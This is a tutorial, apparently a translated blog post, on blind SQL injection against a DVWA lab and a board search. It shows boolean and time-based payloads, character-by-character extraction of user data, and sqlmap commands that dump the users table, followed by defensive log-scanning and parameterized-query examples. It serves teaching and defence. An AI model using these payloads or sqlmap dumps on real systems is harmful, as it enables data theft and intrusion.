SQL Injection (Blind)
If the web page you are testing prints neither errors nor the query result list, an attack of this pattern is hard to carry out: since no query result data is returned, we cannot read data out through an attack such as a UNION query.
In this case, Blind SQL Injection can be used. It is an attack method that extracts database values from nothing more than whether the injected query evaluates to true or false.
1) Boolean-based Blind Attack
If a website provides a board search function, we can test for true/false like this.
(TRUE)
<input>
스터디' AND 1=1--
<result>
Board posts found (true)
(FALSE)
<input>
스터디' AND 1=2--
<result>
No board posts found (false)
If this attempt succeeds on the web page, appending a condition the attacker wants to verify through the AND clause and reading the answer from the result leaks information; this is Blind SQL Injection.
2) Time-based Blind Attack
In some cases the response content is always the same, so true/false cannot be determined from the response alone.
Here true/false can instead be told apart by the difference in response time, by injecting a query that delays the response.
(MS SQL Server environment)
[input]
스터디' IF SYSTEM_USER='admin' WAITFOR DELAY '00:00:5'--
[result]
Select * from Boards where title='스터디' if system_user='admin' waitfor delay '00:00:5' --
1) True: response delayed 5 seconds ( system account: admin )
2) False: immediate response ( X )
(MySQL environment)
[input]
스터디' and sleep(5)#
[result]
SELECT * FROM Boards WHERE title='스터디' AND sleep(5)
1) True: response delayed 5 seconds ( the search word exists )
2) False: immediate response ( X )
In summary, Blind SQL Injection is an attack method that obtains data only from whether the server's response to a query is true or false. By comparing many conditions one after another it can still extract sensitive information, and in almost every case the attack is carried out with an automated tool.
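As an added example (not part of the original post), here is a small Python scanner a defender could run over web server access logs to flag the probe shapes described above: the 1=1 / 1=2 pair, sleep() and WAITFOR DELAY, ascii(substr(...)) character tests, and requests sent with the sqlmap default User-Agent. The log lines, the trailing response-time field and the User-Agent string are constructed for this example; the log format regex and the SLOW_MS threshold are assumptions you would adjust to your own server.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format with the request time in milliseconds appended as the last
# field (constructed layout for this example; adapt LOG_RE to your own server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)" (?P<ms>\d+)$'
)

# Indicator patterns derived from the payload shapes shown on this page.
INDICATORS = {
    "boolean_probe": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),   # AND 1=1 / AND 1=2
    "mysql_delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),        # AND sleep(5)
    "mssql_delay": re.compile(r"\bwaitfor\s+delay\b", re.I),             # WAITFOR DELAY '00:00:5'
    "char_oracle": re.compile(r"\b(ascii|ord)\s*\(\s*(substr|substring|mid|left)\s*\(", re.I),
    "comment_terminator": re.compile(r"(--|#|/\*)\s*$"),                 # trailing -- or #
}
SLOW_MS = 4000  # a 5 s sleep()/WAITFOR shows up as a ~5000 ms request

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [24/Jun/2021:10:00:01 +0900] "GET /dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 512 "-" "Mozilla/5.0" 12
10.0.0.5 - - [24/Jun/2021:10:00:02 +0900] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27+and+1%3D1%23&Submit=Submit HTTP/1.1" 200 512 "-" "Mozilla/5.0" 11
10.0.0.5 - - [24/Jun/2021:10:00:03 +0900] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27+and+sleep%285%29%23&Submit=Submit HTTP/1.1" 200 512 "-" "Mozilla/5.0" 5014
10.0.0.9 - - [24/Jun/2021:10:00:04 +0900] "GET /board/search?title=study%27+IF+SYSTEM_USER%3D%27admin%27+WAITFOR+DELAY+%2700%3A00%3A5%27-- HTTP/1.1" 200 300 "-" "Mozilla/5.0" 5003
10.0.0.9 - - [24/Jun/2021:10:00:05 +0900] "GET /dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 512 "-" "sqlmap/1.5 (https://sqlmap.org)" 10
10.0.0.7 - - [24/Jun/2021:10:00:06 +0900] "GET /board/search?title=study+group HTTP/1.1" 200 300 "-" "Mozilla/5.0" 9
10.0.0.5 - - [24/Jun/2021:10:00:07 +0900] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28%28select+first_name+from+users+where+user_id%3D%271%27%29%2C1%2C1%29%29+%3E+96%23&Submit=Submit HTTP/1.1" 200 512 "-" "Mozilla/5.0" 13
"""


def analyze_line(line):
    """Return a finding dict for one log line, or None when nothing is suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    found = set()
    # Decode every query-string value and test each indicator against it.
    query = urlsplit(m["target"]).query
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:
            for name, rx in INDICATORS.items():
                if rx.search(value):
                    found.add(name)
    if int(m["ms"]) >= SLOW_MS:
        found.add("slow_response")
    if m["ua"].lower().startswith("sqlmap"):
        found.add("sqlmap_user_agent")
    if not found:
        return None
    # A delay function together with a genuinely slow response is the strongest
    # evidence that a time-based probe actually executed on the database.
    if {"mysql_delay", "slow_response"} <= found or {"mssql_delay", "slow_response"} <= found:
        severity = "high"
    elif found - {"slow_response"}:
        severity = "medium"
    else:
        severity = "low"  # slow on its own: worth a look, not an alert
    return {"ip": m["ip"], "ts": m["ts"], "severity": severity, "indicators": sorted(found)}


def scan(log_text):
    """Scan a whole log and return the findings in line order."""
    return [f for f in (analyze_line(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The severity rule is the point: a sleep() or WAITFOR DELAY string in a parameter is only a probe, but the same string on a request that really took about five seconds means the database executed it, which is exactly the signal the time-based method above relies on.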
<Attack Scenario> [password attack]
( 'Z' : ASCII 90 )
<lowercase check>
스터디' AND ASCII(LEFT((SELECT PASSWORD FROM [USERS] WHERE UserID='admin'),1)) > 90
Comparisons like this one are how the attack proceeds.
<Low>
<Boolean-based>
<Time-based>
<input>
1' and ascii(substr((select first_name from users where user_id='1'),1,1)) > 91#
1' and ascii(substr((select first_name from users where user_id='1'),1,1)) > 96#
1' and ascii(substr((select first_name from users where user_id='1'),1,1)) > 97#
This result gives me information about the user's ID, one character at a time.
ASCII: 97 (first character) -> 'a'
<input>
1' and ascii(substr((select first_name from users where user_id='1'),2,1)) > 99#
1' and ascii(substr((select first_name from users where user_id='1'),2,1)) > 100#
ASCII: 100 (second character) -> 'd'
Total ID: admin
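The board search in section 1 and the DVWA Low queries above both depend on the search term being concatenated into the SQL string. This added example (my code, not DVWA's or the post's) reproduces that oracle against a constructed in-memory SQLite database and shows that the same probes stop working once the value is bound as a parameter. SQLite has no ascii() function, so the character test uses its unicode() equivalent; the table contents are made up.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the tables named on this page:
    Boards(title) for the board search, users(user_id, first_name) for DVWA Low."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE Boards(title TEXT);
        INSERT INTO Boards VALUES ('notice'), ('스터디');
        CREATE TABLE users(user_id INTEGER, first_name TEXT);
        INSERT INTO users VALUES (1, 'admin'), (2, 'Gordon');
    """)
    return con


def search_vulnerable(con, title):
    """Query built by string concatenation: the pattern the post exploits.
    Returns the true/false 'posts found' signal the page describes."""
    sql = "SELECT * FROM Boards WHERE title='" + title + "'"
    return con.execute(sql).fetchone() is not None


def search_safe(con, title):
    """Same query with a bound parameter: the input can only ever be a title value."""
    sql = "SELECT * FROM Boards WHERE title=?"
    return con.execute(sql, (title,)).fetchone() is not None


# The post's 1=1 / 1=2 pair: an injectable endpoint answers the two differently.
TRUE_PROBE = "스터디' AND 1=1--"
FALSE_PROBE = "스터디' AND 1=2--"


def has_boolean_oracle(search, con):
    """True when the endpoint distinguishes the two probes, i.e. it is injectable."""
    return search(con, TRUE_PROBE) != search(con, FALSE_PROBE)


def char_probe(threshold):
    """The post's ascii(substr(...)) > N test, adapted to SQLite's unicode()."""
    return ("스터디' AND unicode(substr((SELECT first_name FROM users "
            "WHERE user_id=1),1,1)) > %d--" % threshold)


def demo():
    """Run both implementations against the same probes and collect the answers."""
    con = make_db()
    return {
        "vuln_true": search_vulnerable(con, TRUE_PROBE),     # injected 1=1: posts found
        "vuln_false": search_vulnerable(con, FALSE_PROBE),   # injected 1=2: nothing found
        "vuln_oracle": has_boolean_oracle(search_vulnerable, con),
        "safe_oracle": has_boolean_oracle(search_safe, con),
        "safe_literal": search_safe(con, "스터디"),           # normal search still works
        "vuln_gt96": search_vulnerable(con, char_probe(96)), # 'a' is 97, so true
        "vuln_gt97": search_vulnerable(con, char_probe(97)), # 97 > 97 is false
        "safe_gt96": search_safe(con, char_probe(96)),       # probe is just a weird title
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

has_boolean_oracle() is the post's 1=1 / 1=2 check turned into a regression test: point it at every search function in a code base and require it to return False.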
<Blind SQL Injection using Tool>
Download site: http://sqlmap.org
Move to the downloaded directory
-> python sqlmap.py -u "Attack Target URL" --cookie="site cookie value"
<Method to get the cookie value>
Open the browser's console window and enter the content shown.
When you enter it, the cookie value is printed in the console window.
<Run>
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="YOUR COOKIE"
From output like this we learn which injection techniques are usable and which database server the system runs on.
<Method to get the current DB name>
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="YOUR COOKIE" --current-db
Current database: dvwa
<Method to get the table name>
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="YOUR COOKIE" -D dvwa --tables
<Method to get the data that is stored in the tables>
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="YOUR COOKIE" -T users --dump
This is only a test environment; against a real system it would be a very dangerous situation.